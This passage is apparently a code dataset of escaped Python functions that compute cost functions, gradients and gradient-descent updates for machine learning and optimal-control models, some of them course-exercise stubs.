returnGradOnly=False):\n\n # Unfold the U and W matrices from params\n X = params[0:num_movies * num_features].reshape((num_movies, num_features))\n Theta = params[num_movies * num_features:].reshape((num_users, num_features))\n\n errors = (X.dot(Theta.T) - Y) * R\n J = 1 / 2 * np.sum(np.sum(errors ** 2))\n\n penalty = (reg_lambda / 2) * (np.sum(np.sum(Theta ** 2)) + np.sum(np.sum(X ** 2)))\n J = J + penalty\n\n X_grad = errors.dot(Theta) + reg_lambda * X\n Theta_grad = errors.T.dot(X) + reg_lambda * Theta\n\n grad = np.r_[X_grad.flatten(), Theta_grad.flatten()]\n\n if returnGradOnly:\n return grad.flatten()\n if returnCostOnly:\n return J\n\n return J, grad", "def total_cost(self, X, Y, thetas = None):\n \n if thetas == None:\n thetas = self.thetas\n \n J = 0.0\n m = X.shape[0]\n for x, true_indx in zip(X, Y):\n y = np.zeros(self.noutputs)\n y[true_indx] = 1.\n h_theta = self._forward_prop(x, thetas)[-1]\n J += self.cost(h_theta, y)\n \n return np.sum(J)/m", "def test_gradient(gradient, thetas, activations_neural, classification_matrix, lambda_value=1, step=1E-4, tolerance=1E-4):\n \n dimensional_error(thetas[-1].shape, gradient[-1].shape)\n\n last_thetas = thetas[-1]\n \n last_thetas_plus_step = thetas[-1] + step\n last_thetas_minus_step = thetas[-1] - step\n\n num_grad_total = pd.DataFrame()\n\n for i in range( gradient[-1].shape[0] ):\n\n\n last_thetas_plus = pd.concat( [last_thetas[0:i], last_thetas_plus_step[i:i+1] , last_thetas[i+1:]] , axis=0 )\n\n last_thetas_minus = pd.concat( [last_thetas[0:i], last_thetas_minus_step[i:i+1], last_thetas[i+1:]] , axis=0 )\n\n last_activation_plus = activation_values(activations_neural[-2], last_thetas_plus ).to_numpy()\n last_activation_minus = activation_values(activations_neural[-2], last_thetas_minus).to_numpy()\n\n cost_plus = cost_function_sigmoid([last_activation_plus] , classification_matrix, [last_thetas_plus] , lambda_value)\n cost_minus = cost_function_sigmoid([last_activation_minus], classification_matrix, [last_thetas_minus], lambda_value)\n\n num_grad = (cost_plus - cost_minus)/(2*step) # it's a column DataFrame\n num_grad_total = pd.concat([num_grad_total, num_grad], axis=1)\n\n num_grad_total = num_grad_total.T\n\n dimensional_error(num_grad_total.shape, gradient[-1].shape)\n\n num_grad_total.index = gradient[-1].index\n num_grad_total.columns = gradient[-1].columns\n\n _ = ( np.abs( gradient[-1].to_numpy() - num_grad_total.to_numpy() ) <= tolerance )\n\n return _, num_grad_total", "def build_cost_fn_and_opt(lstm_outputs, labels_, learning_rate):\n predictions = tf.contrib.layers.fully_connected(lstm_outputs[:, -1], 1, activation_fn=tf.sigmoid)\n loss = tf.losses.mean_squared_error(labels_, predictions)\n optimzer = tf.train.AdadeltaOptimizer(learning_rate).minimize(loss)\n \n return predictions, loss, optimzer", "def individual_cost_function(gp, output_trajectory, output_times):\r\n # GET RIGHT PART OF ARRAY\r\n # REFORMAT\r\n # NOISE DATA\r\n # PREDICT NEW VALUES\r\n # GET COST.\r\n X_reshaped = output_times[:,None]\r\n # X_list = GPy_reformat_3D(output_times)\r\n # Y_list = GPy_reformat_3D(output_trajectory)\r\n\r\n # X_list = np.concatenate((X_reshaped,X_reshaped,X_reshaped), axis=1)\r\n X_list = X_reshaped\r\n array1 = output_trajectory.T[:, 0, None]\r\n array2 = output_trajectory.T[:, 1, None]\r\n array3 = output_trajectory.T[:, 2, None]\r\n Y_list = np.concatenate((array1,array2,array3),axis=1)\r\n Y_list = array1\r\n X_list = np.concatenate((X_reshaped,np.zeros_like(X_reshaped)),axis=1)\r\n\r\n\r\n Times_pred_1 = np.concatenate((X_reshaped, np.ones_like(X_reshaped)-1), axis=1)\r\n noise_dict1 = {'output_index': Times_pred_1[:, 1:].astype(int)}\r\n Xpred, Xvar = gp.predict(Times_pred_1,Y_metadata=noise_dict1)\r\n\r\n Times_pred_2 = np.concatenate((X_reshaped, np.ones_like(X_reshaped)), axis=1)\r\n noise_dict2 = {'output_index': Times_pred_2[:, 1:].astype(int)}\r\n Ypred, Yvar = gp.predict(Times_pred_2,Y_metadata=noise_dict2)\r\n\r\n Times_pred_3 = np.concatenate((X_reshaped, np.ones_like(X_reshaped)+1), axis=1)\r\n noise_dict3 = {'output_index': Times_pred_3[:, 1:].astype(int)}\r\n Zpred, Zvar = gp.predict(Times_pred_3,Y_metadata=noise_dict3)\r\n\r\n return gp.log_predictive_density(X_list,Y_list) # ,Y_metadata=noise_dict1) # ARRAY OF ROW INDICES, ARRAY OF COLUMN INDICES, COST\r", "def getCostFunction(self, evalpts, observations, sigma=None, metric=lambda x: sum(x*x)):\n #XXX: better interface for sigma?\n def _(params):\n ind = 0\n for F, n, ofilt, icheck in zip(self._forwardFactories, self._inputs, \\\n self._outputFilters, self._inputCheckers):\n # check input #XXX: is this worthwile to do?\n my_params = params[ind:ind+n]\n checkQ = icheck(my_params, evalpts)\n if checkQ is not None:\n # some parameters are out of range... returns \"cost\"\n return checkQ\n\n Gm = F(params[ind:ind+n])\n if ind == 0:\n x = ofilt(Gm(evalpts)) \n else:\n x = x + ofilt(Gm(evalpts)) \n ind = ind+n\n if sigma is None:\n x = x - observations\n else:\n x = (x - observations) / sigma\n #return sum(real((conjugate(x)*x)))\n #return sum(x*x) \n return metric(x)\n return _", "def cost_function(x, N, w, dt):\n yh = np.abs(fftkernel(x, w / dt)) # density\n # formula for density\n C = np.sum(yh ** 2) * dt - 2 * np.sum(yh * x) * \\\n dt + 2 / np.sqrt(2 * np.pi) / w / N\n C = C * N * N\n # formula for rate\n # C = dt*sum( yh.^2 - 2*yh.*y_hist + 2/sqrt(2*pi)/w*y_hist )\n return C, yh", "def return_terminal_cost_func(TerminalCost='Minimize final angle',\n ReturnGradientAndHessian=False):\n if type(TerminalCost)==str:\n assert TerminalCost in ['Minimize final angle from target angle',\n 'Minimize final angular velocity from target angular velocity'],\\\n \"TerminalCost must be either 'Minimize final angle from target angle' (Default), 'Minimize final angular velocity from target angular velocity'.\"\n else:\n assert type(TerminalCost)==list, \"TerminalCost must be a list of cost types.\"\n for el in TerminalCost:\n assert type(el)==str, \"Each element of TerminalCost must be a string. Not \" + str(type(el)) + \".\"\n assert el in ['Minimize final angle from target angle',\n 'Minimize final angular velocity from target angular velocity'],\\\n \"Each element of TerminalCost must be either 'Minimize final angle from target angle' (Default), 'Minimize final angular velocity from target angular velocity'. '\" + el + \"' not accepted.\"\n\n if \"Minimize final angle from target angle\" in TerminalCost:\n result1 = lambda X,U,dt: k4*(1/2)*(X[0,-1]-TargetAngle)**2\n result1_grad = lambda X,U,dt:\\\n np.matrix([[k4*(X[0,-1]-TargetAngle)],[0]])\n result1_hess = lambda X,U,dt: np.matrix([[k4*1,0],[0,0]])\n else:\n result1 = lambda X,U,dt: 0\n result1_grad = lambda X,U,dt:\\\n np.matrix([[0],[0]])\n result1_hess = lambda X,U,dt: np.matrix([[0,0],[0,0]])\n\n if \"Minimize final angular velocity from target angular velocity\" in TerminalCost:\n result2 = lambda X,U,dt: k5*(1/2)*(X[1,-1]-TargetAngularVelocity)**2\n result2_grad = lambda X,U,dt:\\\n np.matrix([[0],[k5*(X[1,-1]-TargetAngularVelocity)]])\n result2_hess = lambda X,U,dt: np.matrix([[0,0],[0,k5*1]])\n else:\n result2 = lambda X,U,dt: 0\n result2_grad = lambda X,U,dt:\\\n np.matrix([[0],[0]])\n result2_hess = lambda X,U,dt: np.matrix([[0,0],[0,0]])\n\n result = lambda X,U,dt: result1(X,U,dt) \\\n + result2(X,U,dt)\n if ReturnGradientAndHessian:\n result_grad = lambda X,U,dt: result1_grad(X,U,dt) \\\n + result2_grad(X,U,dt)\n result_hess = lambda X,U,dt: result1_hess(X,U,dt) \\\n + result2_hess(X,U,dt)\n return(result,result_grad,result_hess)\n else:\n return(result)", "def evaluate_trajs(cost, states, controls):\n N = states.shape[0]\n T = controls.shape[1]\n costs = np.zeros(N)\n for i, (x, u) in enumerate(zip(states, controls)):\n for t in range(T):\n costs[i] += cost.stage_cost(x[t],u[t])\n costs[i] += cost.terminal_cost(x[T])\n \n return costs", "def compute_cost(AL, Y):\n pass", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n\r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range (num_iterations):\r\n \r\n h = numpy.dot(features, theta)\r\n \r\n theta = theta - alpha / m * numpy.dot((h-values),features)\r\n \r\n cost = compute_cost(features, values, theta)\r\n \r\n cost_history.append(cost)\r\n\r\n return theta, pandas.Series(cost_history) # leave this line for the grader\r", "def return_running_cost_func(RunningCost='Minimize Input Energy'):\n if type(RunningCost)==str:\n assert RunningCost in ['Minimize Input Energy',\n 'Minimize time away from target angle',\n 'Minimize time away from target angular velocity'],\\\n \"RunningCost must be either 'Minimize Input Energy','Minimize time away from target angle', or 'Minimize time away from target angular velocity'.\"\n else:\n assert type(RunningCost)==list, \"RunningCost must be a list of cost types.\"\n for el in RunningCost:\n assert type(el)==str, \"Each element of RunningCost must be a string. Not \" + str(type(el)) + \".\"\n assert el in ['Minimize Input Energy',\n 'Minimize time away from target angle',\n 'Minimize time away from target angular velocity'],\\\n \"Each element of RunningCost must be either 'Minimize Input Energy','Minimize time away from target angle', or 'Minimize time away from target angular velocity'. '\" + el + \"' not accepted.\"\n\n if \"Minimize Input Energy\" in RunningCost:\n result1 = lambda X,U,dt: np.trapz((k3/2)*U**2,dx=dt)\n else:\n result1 = lambda X,U,dt: 0\n\n if \"Minimize time away from target angle\" in RunningCost:\n result2 = lambda X,U,dt: np.trapz(k1*(1/2)*(X[0,1:]-TargetAngle)**2,dx=dt)\n else:\n result2 = lambda X,U,dt: 0\n\n if \"Minimize time away from target angular velocity\" in RunningCost:\n result3 = lambda X,U,dt:\\\n np.trapz(k2*(1/2)*(X[1,1:]-TargetAngularVelocity)**2,dx=dt)\n else:\n result3 = lambda X,U,dt: 0\n\n result = lambda X,U,dt: result1(X,U,dt) \\\n + result2(X,U,dt) \\\n + result3(X,U,dt)\n return(result)", "def getVectorCostFunction(self, evalpts, observations):\n def _(params):\n forward = self.getForwardEvaluator(evalpts)\n return sum(forward(params) - observations)\n return _", "def cost(self, cost_object, target):\n\n return cost_object.f(self.a[-1], target).mean(axis=0).sum()", "def checkCostFunction(lbd=0):\n # Create small problem\n X_t = np.random.rand(4, 3)\n Theta_t = np.random.rand(5, 3)\n\n # Zap out most entries\n Y = X_t.dot(Theta_t.T)\n Y[np.random.rand(Y.shape[0], Y.shape[1]) > .5] = 0\n R = np.zeros(Y.shape)\n R[Y == 0] = 1\n\n # Run Gradient Checking\n X = np.random.randn(X_t.shape[0], X_t.shape[1])\n Theta = np.random.randn(Theta_t.shape[0], Theta_t.shape[1])\n num_users = Y.shape[1]\n num_movies = Y.shape[0]\n num_features = Theta_t.shape[1]\n\n def Jfunc(t):\n return cofiCostFunc(t, Y, R, num_users, num_movies, num_features, lbd)\n\n numgrad = computeNumericalGradient(Jfunc, np.r_[X.flatten(), Theta.flatten()])\n\n cost, grad = cofiCostFunc(np.r_[X.flatten(), Theta.flatten()], Y, R, num_users, num_movies, num_features, lbd)\n\n print(np.c_[numgrad, grad])\n print('The above two columns you get should be very similar.')\n print('(Left-Your Numerical Gradient, Right-Analytical Gradient)\\n')\n\n diff = np.linalg.norm(numgrad-grad)/np.linalg.norm(numgrad+grad)\n print('If your cost function implementation is correct, then')\n print('the relative difference will be small (less than 1e-9).')\n print('Relative Difference: %g\\n' % diff)", "def compute_cost(AL,Y,cost_function_name):\n cost_functions = {\n \"cost_func_1\": cf.cost_function_1\n } \n\n activ_func = cost_functions.get(cost_function_name,lambda : \"Invalid Cost Function Name !\")\n\n cost,dAL = activ_func(AL,Y)\n\n return cost, dAL", "def get_cost(self, Y, T):\n return - np.multiply(T, np.log(Y)).sum() / Y.shape[0]", "def compute_cost(self,X, y):\n \n num_samples = len(X)\n # Do Forward propagation to calculate our predictions\n z1 = X.dot(self.W1) + self.b1\n a1 = np.tanh(z1)\n z2 = a1.dot(self.W2) + self.b2\n exp_z = np.exp(z2)\n a2 = exp_z / np.sum(exp_z, axis=1, keepdims=True)\n softmax_scores = a2\n # Calculate the cross-entropy loss\n cross_ent_err = -np.log(softmax_scores[range(num_samples), y])\n data_loss = np.sum(cross_ent_err)\n return 1./num_samples * data_loss", "def eval_costfunc(V=None, W=None, R=None, cmat=None, ystar=None,\n bmat=None, tbmat=None,\n tmesh=None, veldict=None, fbftdict=None,\n penau=True):\n\n def _dywdy(t, V=None):\n cvel = np.load(veldict[t]+'.npy')\n delty = ystar(t) - lau.mm_dnssps(cmat, cvel)\n if V is None:\n return np.dot(delty.T, lau.mm_dnssps(W, delty))\n else:\n return np.dot(delty.T, lau.mm_dnssps(V, delty))\n\n def _uru(t):\n if not penau:\n return 0\n cvel = np.load(veldict[t]+'.npy')\n if R is None and tbmat is not None:\n try:\n curfb = np.dot(np.load(fbftdict[t]['mtxtb']+'.npy').T, cvel)\n curft = tbmat.T*np.load(fbftdict[t]['w']+'.npy')\n except KeyError:\n curfb = np.dot(np.load(fbftdict[None]['mtxtb']+'.npy').T, cvel)\n curft = tbmat.T*np.load(fbftdict[None]['w']+'.npy')\n return np.dot((curfb+curft).T, curfb+curft)\n else:\n raise NotImplementedError()\n\n cts = tmesh[1] - tmesh[0]\n # time int by pw trapezoidal rule\n cfv = 0\n ccfv_old = _dywdy(tmesh[0]) + _uru(tmesh[0])\n for k, t in enumerate(tmesh[1:]):\n cts = t - tmesh[k]\n ccfv_new = _dywdy(t) + _uru(t)\n cfv += 0.5*cts*(ccfv_new + ccfv_old)\n ccfv_old = ccfv_new\n # final pena value\n cfv += _dywdy(tmesh[-1], V=V)\n return cfv", "def return_quadratic_cost_function_expansion_variables(\n X,U,dt,\n RunningCost=\"Minimize Input Energy\"):\n\n if type(RunningCost)==str:\n assert RunningCost in ['Minimize Input Energy',\n 'Minimize time away from target angle',\n 'Minimize time away from target angular velocity'],\\\n \"RunningCost must be either 'Minimize Input Energy','Minimize time away from target angle', or 'Minimize time away from target angular velocity'.\"\n else:\n assert type(RunningCost)==list, \"RunningCost must be a list of cost types.\"\n for el in RunningCost:\n assert type(el)==str, \"Each element of RunningCost must be a string. Not \" + str(type(el)) + \".\"\n assert el in ['Minimize Input Energy',\n 'Minimize time away from target angle',\n 'Minimize time away from target angular velocity'],\\\n \"Each element of RunningCost must be either 'Minimize Input Energy','Minimize time away from target angle', or 'Minimize time away from target angular velocity'. '\" + el + \"' not accepted.\"\n\n # returns a list of length len(Time)-1, each element with shape (1,1), where n is the number of states.\n l_func = return_l_func(RunningCost=RunningCost)\n l = list(\n map(\n lambda X,U: l_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (n,1), where n is the number of states.\n lx_func = return_lx_func(RunningCost=RunningCost)\n lx = list(\n map(\n lambda X,U: lx_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (m,1), where n is the number of states.\n lu_func = return_lu_func(RunningCost=RunningCost)\n lu = list(\n map(\n lambda X,U: lu_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (m,n), where m is the number of inputs and n is the number of states.\n lux_func = return_lux_func(RunningCost=RunningCost)\n lux = list(\n map(\n lambda X,U: lux_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (n,m), where n is the number of states and m is the number of inputs.\n lxu_func = return_lxu_func(RunningCost=RunningCost)\n lxu = list(\n map(\n lambda X,U: lxu_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (m,m), where m is the number of inputs.\n luu_func = return_luu_func(RunningCost=RunningCost)\n luu = list(\n map(\n lambda X,U: luu_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n # returns a list of length len(Time)-1, each element with shape (n,n), where n is the number of states.\n lxx_func = return_lxx_func(RunningCost=RunningCost)\n lxx = list(\n map(\n lambda X,U: lxx_func(X,U,dt),\n X[:,1:].T,\n U\n )\n )\n\n return(l,lx,lu,lux,lxu,luu,lxx)", "def cost_function(self, X, y, theta_list, bias):\n total_samples = len(y)\n loss = 0\n\n for i in range(total_samples):\n hypothesis = bias\n hypothesis += np.matmul(X[i], np.array(theta_list).T)\n \n de = 1.0 + np.exp(-hypothesis)\n sigmoidhypothesis = 1.0/de\n\n loss += (y[i]*np.log(sigmoidhypothesis)) + ((1-y[i])*(np.log(1 - sigmoidhypothesis)))\n\n return -1 * (loss/total_samples) #loss calculation", "def SGD_ce(data, labels, eta_0, T):\n data = sklearn.preprocessing.normalize(data)\n w = np.zeros((10,784))\n for t in range(1, T + 1):\n i = np.random.randint(len(data))\n w = w - (eta_0) * grad(w, data[i], labels[i])\n return w", "def gradient_descent(features, values, theta, alpha, num_iterations):\n m = len(values)\n cost_history = []\n\n for i in range(num_iterations):\n predicted_values = np.dot(features, theta)\n delta = alpha / m * np.dot((predicted_values - values), features)\n theta = theta - delta\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n return theta, pandas.Series(cost_history)", "def learn_thetas(self, X, Y):\n \n thetas0 = self.reshape_thetas(self.thetas, 'vector')\n res = minimize(self._objective_function, thetas0, args=(X, Y), method='Newton-CG', jac=True,\n options = {'disp': False, 'maxiter': 400})\n \n self.thetas = self.reshape_thetas(res.x, 'list')", "def crps_cost_function(y_true, y_pred, theano=False):\n\n # Split input\n mu = y_pred[:, 0]\n sigma = y_pred[:, 1]\n # Ugly workaround for different tensor allocation in keras and theano\n if not theano:\n y_true = y_true[:, 0] # Need to also get rid of axis 1 to match!\n\n # To stop sigma from becoming negative we first have to convert it the the variance and then take the square root again. \n var = K.square(sigma)\n # The following three variables are just for convenience\n loc = (y_true - mu) / K.sqrt(var)\n phi = 1.0 / np.sqrt(2.0 * np.pi) * K.exp(-K.square(loc) / 2.0)\n Phi = 0.5 * (1.0 + tf.math.erf(loc / np.sqrt(2.0)))\n # First we will compute the crps for each input/target pair\n crps = K.sqrt(var) * (loc * (2. * Phi - 1.) + 2 * phi - 1. / np.sqrt(np.pi))\n # Then we take the mean. The cost is now a scalar\n \n return K.mean(crps)", "def nnCostFunction2(nn_params, input_layer_size, hidden_layer_size, num_labels, X, y, lambda_):\n # Reshape nn_params back into the parameters Theta1 and Theta2, the weight matrices\n # for our 2 layer neural network\n Theta1 = nn_params[:hidden_layer_size * (input_layer_size + 1)].reshape(\n (hidden_layer_size, input_layer_size + 1))\n Theta2 = nn_params[hidden_layer_size *\n (input_layer_size + 1):].reshape((num_labels, hidden_layer_size + 1))\n\n # Setup some useful variables\n m = X.shape[0]\n\n # Add ones to the X data matrix\n X = np.insert(X, 0, 1, axis=1)\n\n # Perform forward propagation for layer 2\n z2 = np.matmul(X, Theta1.transpose())\n a2 = sigmoid(z2)\n a2 = np.insert(a2, 0, 1, axis=1)\n z3 = np.matmul(a2, Theta2.transpose())\n a3 = sigmoid(z3)\n\n # turn Y into a matrix with a new column for each category and marked with 1\n y_one_hot = np.zeros_like(a3)\n for i in range(m):\n y_one_hot[i, y[i] - 1] = 1\n\n # Calculate the cost of our forward prop\n ones = np.ones_like(a3)\n A = np.matmul(y_one_hot.transpose(), np.log(a3)) + \\\n np.matmul((ones - y_one_hot).transpose(), np.log(ones - a3))\n J = -1 / m * A.trace()\n J += lambda_ / (2 * m) * \\\n (np.sum(Theta1[:, 1:] ** 2) + np.sum(Theta2[:, 1:] ** 2))\n\n # Perform backward propagation to calculate deltas & gradients\n delta3 = a3 - y_one_hot\n delta2 = np.matmul(delta3, Theta2[:, 1:]) * sigmoidGradient(z2)\n Theta2_grad = np.matmul(a2.transpose(), delta3).transpose()\n Theta1_grad = np.matmul(X.transpose(), delta2).transpose()\n\n Theta1_grad[:, 1:] += lambda_ * Theta1[:, 1:]\n Theta2_grad[:, 1:] += lambda_ * Theta2[:, 1:]\n Theta1_grad /= m\n Theta2_grad /= m\n grad = np.concatenate([Theta1_grad.reshape(-1), Theta2_grad.reshape(-1)])\n return J, grad", "def compute_cost(y, tx, w, method=\"mae\"):\n err = y - tx.dot(w)\n if method.lower() == \"mae\":\n cost_f = np.mean(np.abs(err))\n elif method.lower() == \"mse\":\n cost_f = np.mean(err**2)/2\n else:\n return NotImplementedError\n return cost_f", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n \r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range(num_iterations):\r\n # your code here\r\n cost = compute_cost(features, values, theta)/(2.0*m)\r\n cost_history.append([cost])\r\n \r\n error = features.dot(theta) - values\r\n error = np.reshape(error,(error.shape[0], 1))\r\n errorWeighted = features*error\r\n errorSum = (np.sum(errorWeighted,0))/(m*1.0)\r\n theta = theta - alpha*errorSum \r\n \r\n return theta, pandas.Series(cost_history)", "def cost_func(plist):\n\t\tgamma, alpha = plist\n\t\tk = ac.Moffat2DKernel(gamma, alpha, x_size=nx, y_size=ny)\n\n\t\tarr_out_predict = ac.convolve(arr_in, k)\n\n\t\tarr_out_fit, arr_out_predict_fit = match_dimension(arr_out, arr_out_predict)\n\t\tdiff = (arr_out_fit - arr_out_predict_fit)*scale_factor\n\n\t\treturn np.sum(diff**2)/diff.size", "def compute_cost_function(X, Y, theta, lambda_factor, temp_parameter):\n h = compute_probabilities(X, theta, temp_parameter)\n\n cost = 0\n for i in range(X.shape[0]):\n for j in range(theta.shape[0]):\n if Y[i] == j:\n cost += np.log(h[j,i])\n\n cost = -cost / X.shape[0]\n\n theta = np.power(theta, 2)\n\n cost += lambda_factor / 2 * theta.sum()\n\n return cost", "def compute_gradients(self, logits, target):\n\n target_length = target.shape[0]\n num_time_steps = logits.shape[0]\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n\n # expand labels by inserting a blank between each pair\n normalized_logits = softmax(logits)\n blank_label = normalized_logits.shape[1] - 1\n l = add_blanks(target, blank_label)\n target_length = l.shape[0]\n\n alpha = self.compute_forward_variables(normalized_logits, target) \n beta = self.compute_backward_variables(normalized_logits, target)\n\n # rescale\n alpha = alpha / np.sum(alpha, axis=0)\n beta = beta / np.sum(beta, axis=0)\n alphabeta = alpha * beta\n print \"alpha\"\n print alpha\n\n # compute zt\n z = Counter()\n for t in xrange(num_time_steps):\n for s, k in enumerate(l):\n z[t] += alphabeta[s, t] / normalized_logits[t, k]\n \n # normalized_logits is time steps t by labels k\n # alpha is 2 * target_length - 1 by time steps\n lab_zk = np.zeros_like(normalized_logits)\n for s, k in enumerate(l):\n for t in xrange(num_time_steps):\n lab_zk[t, k] += alphabeta[s, t]\n\n grad = normalized_logits\n for k in xrange(target.shape[0]):\n for t in xrange(num_time_steps):\n ytk = normalized_logits[t, k]\n constant = 1.0 / (ytk * z[t])\n grad[t, k] = ytk - constant * lab_zk[t, k]\n \n return grad", "def calculate_cost(x, y, weights):\r\n predictions = compute_prediction(x, weights)\r\n cost = np.mean(-y * np.log(predictions) - (1 - y) * np.log(1 - predictions))\r\n return cost", "def compute_gradient(\n *,\n source_states,\n task,\n compute_phi,\n compute_psi,\n params,\n key,\n method,\n oracle_states,\n lissa_kappa,\n main_batch_size,\n covariance_batch_size,\n weight_batch_size,\n d,\n compute_feature_norm_on_oracle_states,\n sample_states,\n use_tabular_gradient = True,\n):\n # The argument passed to vjp should be a function of parameters\n # to Phi.\n phi_params = params['phi_params']\n source_phi, phi_vjp = jax.vjp(\n lambda params: compute_phi(params, source_states), phi_params\n )\n\n # We needed compute_phi to take params as an argument to work out\n # gradients w.r.t the parameters in the vjp above. However,\n # for future use we can just wrap the parameters up in the function\n # for other usage.\n compute_phi_no_params = functools.partial(compute_phi, phi_params)\n\n if method == 'lissa' and compute_feature_norm_on_oracle_states:\n oracle_phis = compute_phi(phi_params, oracle_states) # pytype: disable=wrong-arg-types # jax-ndarray\n feature_norm = utils.compute_max_feature_norm(oracle_phis)\n else:\n feature_norm = None\n\n # This determines the weight vectors to be used to perform the gradient step.\n if method == 'explicit':\n # With the explicit method we maintain a running weight vector.\n explicit_weight_matrix = params['explicit_weight_matrix']\n weight_1 = jnp.squeeze(explicit_weight_matrix[:, task], axis=1)\n weight_2 = jnp.squeeze(explicit_weight_matrix[:, task], axis=1)\n else: # Implicit methods.\n if method == 'oracle':\n # This exactly determines the covariance in the tabular case,\n # i.e. when oracle_states = S.\n Phi = compute_phi_no_params(oracle_states)\n num_states = oracle_states.shape[0]\n\n covariance_1 = jnp.linalg.pinv(Phi.T @ Phi) * num_states\n covariance_2 = covariance_1\n\n # Use all states for weight vector.\n weight_states_1 = oracle_states\n weight_states_2 = weight_states_1\n if method == 'naive':\n # The naive method uses one covariance matrix for both weight vectors.\n covariance_1, key = estimates.naive_inverse_covariance_matrix(\n compute_phi_no_params, sample_states, key, d, covariance_batch_size\n )\n covariance_2 = covariance_1\n\n weight_states_1, key = sample_states(key, weight_batch_size)\n weight_states_2 = weight_states_1\n elif method == 'naive++':\n # The naive method uses one covariance matrix for both weight vectors.\n covariance_1, key = estimates.naive_inverse_covariance_matrix(\n compute_phi_no_params, sample_states, key, d, covariance_batch_size\n )\n covariance_2, key = estimates.naive_inverse_covariance_matrix(\n compute_phi_no_params, sample_states, key, d, covariance_batch_size\n )\n\n weight_states_1, key = sample_states(key, weight_batch_size)\n weight_states_2, key = sample_states(key, weight_batch_size)\n elif method == 'lissa':\n # Compute two independent estimates of the inverse covariance matrix.\n covariance_1, key = estimates.lissa_inverse_covariance_matrix(\n compute_phi_no_params,\n sample_states,\n key,\n d,\n covariance_batch_size,\n lissa_kappa,\n feature_norm=feature_norm,\n )\n covariance_2, key = estimates.lissa_inverse_covariance_matrix(\n compute_phi_no_params,\n sample_states,\n key,\n d,\n covariance_batch_size,\n lissa_kappa,\n feature_norm=feature_norm,\n )\n\n # Draw two separate sets of states for the weight vectors (important!)\n weight_states_1, key = sample_states(key, weight_batch_size)\n weight_states_2, key = sample_states(key, weight_batch_size)\n\n # Compute the weight estimates by combining the inverse covariance\n # estimate and the sampled Phi & Psi's.\n weight_1 = (\n covariance_1\n @ compute_phi(phi_params, weight_states_1).T # pytype: disable=wrong-arg-types # jax-ndarray\n @ compute_psi(weight_states_1, task)\n ) / len(weight_states_1)\n weight_2 = (\n covariance_2\n @ compute_phi(phi_params, weight_states_2).T # pytype: disable=wrong-arg-types # jax-ndarray\n @ compute_psi(weight_states_2, task)\n ) / len(weight_states_2)\n\n prediction = jnp.dot(source_phi, weight_1)\n estimated_error = prediction - compute_psi(source_states, task)\n\n if use_tabular_gradient:\n # We use the same weight vector to move all elements of our batch, but\n # they have different errors.\n partial_gradient = jnp.reshape(\n jnp.tile(weight_2, main_batch_size), (main_batch_size, d)\n )\n\n # Line up the shapes of error and weight vectors so we can construct the\n # gradient.\n expanded_estimated_error = jnp.expand_dims(estimated_error, axis=1)\n partial_gradient = partial_gradient * expanded_estimated_error\n\n # Note: this doesn't work for duplicate indices. However, it shouldn't\n # add any bias to the algorithm, and is faster than checking for\n # duplicate indices. Most of the time we care about the case where our\n # batch size is much smaller than the number of states, so duplicate\n # indices should be rare.\n phi_gradient = jnp.zeros_like(phi_params)\n phi_gradient = phi_gradient.at[source_states, :].set(partial_gradient)\n else:\n # Calculate implicit gradient (Phi @ w_1 - Psi) @ w_2.T\n implicit_gradient = jnp.outer(estimated_error, weight_2)\n # Pullback implicit gradient to get the full Phi gradient.\n (phi_gradient,) = phi_vjp(implicit_gradient)\n gradient = {'phi_params': phi_gradient}\n\n if method == 'explicit':\n weight_gradient = source_phi.T @ estimated_error\n expanded_gradient = jnp.expand_dims(weight_gradient, axis=1)\n\n explicit_weight_matrix = params['explicit_weight_matrix']\n explicit_weight_gradient = jnp.zeros_like(explicit_weight_matrix)\n explicit_weight_gradient = explicit_weight_gradient.at[:, task].set(\n expanded_gradient\n )\n gradient['explicit_weight_matrix'] = explicit_weight_gradient\n\n return gradient, key", "def getCostFunctionSlow(self, evalpts, observations):\n #XXX: update interface to allow metric?\n def _(params):\n v = self.getVectorCostFunction(evalpts, observations)\n x = v(params)\n return sum(real((conjugate(x)*x)))\n return _", "def _construct_reg_costs(self):\n param_reg_cost = sum([T.sum(p**2.0) for p in self.joint_params])\n return param_reg_cost", "def gradient_descent(features, values, theta, alpha, num_iterations):\n \n # number of points\n npoints = len(values)\n \n # intialize cost history\n cost_history = []\n \n # num_interations iterations\n for iiter in range(num_iterations):\n \n # compute and store cost\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n \n # update values of theta\n values_predicted = np.dot(features, theta)\n theta = theta + (alpha/npoints)*(np.dot(values - values_predicted,features))\n \n return theta, pandas.Series(cost_history)", "def _get_cost(self):\n logging.info(\"Cost: {}\".format(self.cost_function.name))\n\n with tf.name_scope(\"cost\"):\n\n if self.cost_function == Cost.BATCH_DICE_LOG or self.cost_function == Cost.BATCH_DICE_SOFT or \\\n self.cost_function == Cost.BATCH_DICE_SOFT_CE:\n # calculate Dice loss over the complete batch (take batch as pseudo 3d Tensor)\n if self._n_class == 1:\n # if nr classes is 1 axis 3 has only one component\n axis = (0, 1, 2, 3)\n else:\n axis = (0, 1, 2)\n else:\n # compute dice for each slice and take average (normally not used but considered as option)\n if self._n_class == 1:\n axis = (1, 2, 3)\n else:\n axis = (1, 2)\n # flatten input and outpout\n flat_logits = tf.reshape(self.logits, [-1, self._n_class])\n flat_labels = tf.reshape(self.y, [-1, self._n_class])\n\n # cross entropy loss\n if self.cost_function == Cost.CROSS_ENTROPY:\n # if class weights are None cross entropy will not be weighted\n loss = tfu.get_cross_entropy(logits=flat_logits, y=flat_labels, n_class=self._n_class,\n weights=self._class_weights_ce)\n # Dice loss\n elif self.cost_function == 